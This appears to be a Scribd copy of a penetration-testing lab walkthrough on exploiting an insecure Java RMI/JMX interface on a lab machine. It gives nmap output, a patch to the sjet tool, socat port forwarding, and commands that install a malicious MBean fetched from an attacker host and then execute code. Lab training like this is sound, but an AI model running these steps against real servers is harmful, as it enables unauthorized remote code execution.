Scribd
Upload
140 views9 pages

© 2020 Caendra Inc. - Hera For Waptxv2 - Insecure Rmi

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
140 views9 pages

© 2020 Caendra Inc. - Hera For Waptxv2 - Insecure Rmi

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

1

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


GETTING STARTED

You are placed in an unknown network. Using nmap, discover a Remote Method Invocation interface
and achieve code execution by taking advantage of a misconfiguration.

• Find and identify a vulnerable interface


• Write a custom tool or modify a publicly available one to achieve code execution

• Attacking insecure RMI interfaces


• Customizing a tool in order to successfully attack RMI implementations

• Burpsuite
• RMI exploitation tool e.g. sjet (https://github.com/siberas/sjet)
• Socat
• Nmap
• Netcat

The vulnerable machine can be found at 172.16.64.205

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


GETTING STARTED

Find all RMI ports on the target machine.

Tweak the exploitation tool a bit, so that it is able to talk to the vulnerable interface. Focus on any
hardcoded names that need to be tweaked.

Use port forwarding so that the RMI interface can properly communicate with its second part.

Run the exploit in order to obtain code execution.

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


4

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


SOLUTIONS – TASK #1
SOLUTIONS
Below, you can find solutions for each task. Remember though, that you can follow your own strategy,
which may be different from the one explained in the following lab.

A basic nmap scan can with the -A option (or the “rmi-dumpregistry” script) can be helpful to list the
whole interface.

Nmap scan report for 172.16.64.205


Host is up (0.14s latency).
Not shown: 65345 closed ports, 186 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 76:f6:ef:c1:3f:45:1a:a8:8a:91:50:34:02:0b:5b:0b (RSA)
| 256 46:c3:cc:07:8f:b4:d6:68:5f:07:c6:6c:e2:06:16:45 (ECDSA)
|_ 256 5b:50:f1:f7:be:f9:fa:96:30:63:40:73:ac:59:69:8c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
9999/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| CustomJMXRMI
| javax.management.remote.rmi.RMIServerImpl_Stub
| @127.0.1.1:40767
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
40767/tcp open java-rmi Java RMI

We notice a custom URL and a local Stub. This might be an issue when trying to exploit the interface
using an automated tool.

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


SOLUTIONS – TASK #2

We have downloaded the tool https://github.com/siberas/sjet with “git clone” as well as a jython
standalone jar from http://search.maven.org/remotecontent?filepath=org/python/jython-
standalone/2.7.0/jython-standalone-2.7.0.jar

If we try to run the tool as described in its README github section, we will encounter an error.

First, we can observe that the tool uses a default jmxrmi URL…

…while the registry has a custom name.

In order to match it, we will need to modify the program itself (sjet.py)

In the beginning of the file we should change JMXServiceURL to CustomJMXRMI, as follows.

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


SOLUTIONS – TASK #2

However, the connection cannot be established still.

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


SOLUTIONS – TASK #3

If you run Wireshark on local loopback (or all interfaces) you will observe that during the exploit’s
execution, your machine is trying to connect to the RMI Stub which is implemented on, as the registry
dump says, 127.0.1.1

This is of course not true and as port 40767 is opened, you should redirect traffic from localhost 40767
to the remote host. This can be achieved using socat.

socat tcp-l:40767,fork tcp:172.16.64.205:40767

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI


SOLUTIONS – TASK #4

Now with socat set up you can run the patched tool twice in order to achieve code execution. First, you
install the MBean with the below command.

jython sjet.py 172.16.64.205 9999 password install http://172.16.64.3:7000


7000

It will be protected with a password “password”.

Now, to execute code using your installed MBean you can use the below command.

jython sjet.py 172.16.64.205 9999 password command "id"

The machine is compromised! Don’t forget to uninstall the malicious MBean, as follows.

© 2020 Caendra Inc. | HERA for WAPTXv2 | Insecure RMI

You might also like